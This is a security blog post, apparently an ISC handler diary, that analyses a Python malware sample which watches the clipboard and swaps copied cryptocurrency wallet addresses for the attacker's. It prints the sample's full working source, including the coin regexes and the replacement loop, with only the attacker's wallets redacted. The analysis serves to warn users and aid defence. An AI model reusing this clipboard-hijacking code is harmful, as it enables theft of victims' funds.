today is Sep 20, 2021

 

More info at https://cryptocurrents.net/

Be careful if you're a user of cryptocurrencies. My goal is not to re-open a debate about them and their associated financial risks. No, I'm talking here about technical risk. Wallet addresses are long strings of characters that are pretty impossible to use manually. It means that you'll use your clipboard to copy/paste your wallets to perform payments. But some malware monitors your clipboard for "interesting data" (like wallet addresses) and tries to replace it with another one. If you perform a payment operation, it means that you will transfer some btc or XMR to the wrong wallet, owned by the attacker.

Yesterday, I spotted a simple malicious Python script that performs exactly this.The script SHA256 is ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343 and has a current score of 17/57[1]. The main code is obfusctated in a Base64-encode variable.

As you can see in the code below, this script is delivered with love to the victim! Random love quotes are added in the script to defeat some automated analysis. The script is based on the pyperclip[2] library that is common in the Python ecosystem. It allows manipulating the clipboard. The fact that the script does not test if the module is already installed makes me think that this script is part of a framework or has dependencies with others.

The clipboard is controlled at regular intervals and searched for classic cryptocurrencies through regular expressions. If there is a match, the clipboard content is swapped with a rogue wallet. Two are two defined in this sample.

Here is the code:

#If I know what love is import pyperclip #I fell in love with her courage import json #If you live to be a hundred import time #A man is already halfway in love import re #Women are meant to be loved import argparse #You make me want to be a better man from datetime import datetime #Thinking of you keeps me def main(): # infinite keeps me while 1: now = datetime.now() time.sleep(2) #Let me love you #There is never a time or place for true love user_clipboard = pyperclip.paste() #true love crypto_found = spiff( user_clipboard ) replacement_address = replace( user_clipboard, crypto_found ) #love is so short, forgetting is so long master_addresses = { "btc": "xxxxxxxxxx", "xmr": "null", "eth": "xxxxxxxxxx", "dash": "null", "xrp": "null", "doge": "null", "ada": "null", "lite": "null", "dot": "null", "tron": "null" } #cares and fears def replace(user_clipboard, crypto_found): if crypto_found != 0 and master_addresses[crypto_found] != "null": pyperclip.copy(master_addresses[crypto_found]) return str(master_addresses[crypto_found]) return 0 #until love’s vulnerable def spiff(user_clipboard): crypto_regex_match = { "btc": "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$", "xmr": "4[0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}", "eth": "^0x[a-fA-F0-9]{40}$", "dash": "^X[1-9A-HJ-NP-Za-km-z]{33}$", "xrp": "^r[0-9a-zA-Z]{24,34}$", "doge": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$", "ada": "^D[A-NP-Za-km-z1-9]{35,}$", "lite": "^[LM3][a-km-zA-HJ-NP-Z1-9]{25,34}$", "tron": "^T[a-zA-Z0-9]{33}$", "dot": "^[1-9A-HJ-NP-Za-km-z]*$", } #I love you without knowing how for k, v in crypto_regex_match.items(): if bool(re.search(v, user_clipboard)): return str(k) return 0 #A purpose of human life main() #Love is always patient and kind

I checked the two wallets in the script but then don't show any transaction at this time.

[Update 1]

Brian Krebs contacted me to report a story he posted a few days ago about a real case of such a clipboard swapping technique[3]. This article is worth reading!

[1] https://www.virustotal.com/gui/file/ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343/detection [2] https://pypi.org/project/pyperclip/ [3] https://krebsonsecurity.com/2021/08/man-robbed-of-16-bitcoin-sues-young-thieves-parents/

Xavier Mertens (@xme) Senior ISC Handler - Freelance Cyber Security Consultant PGP Key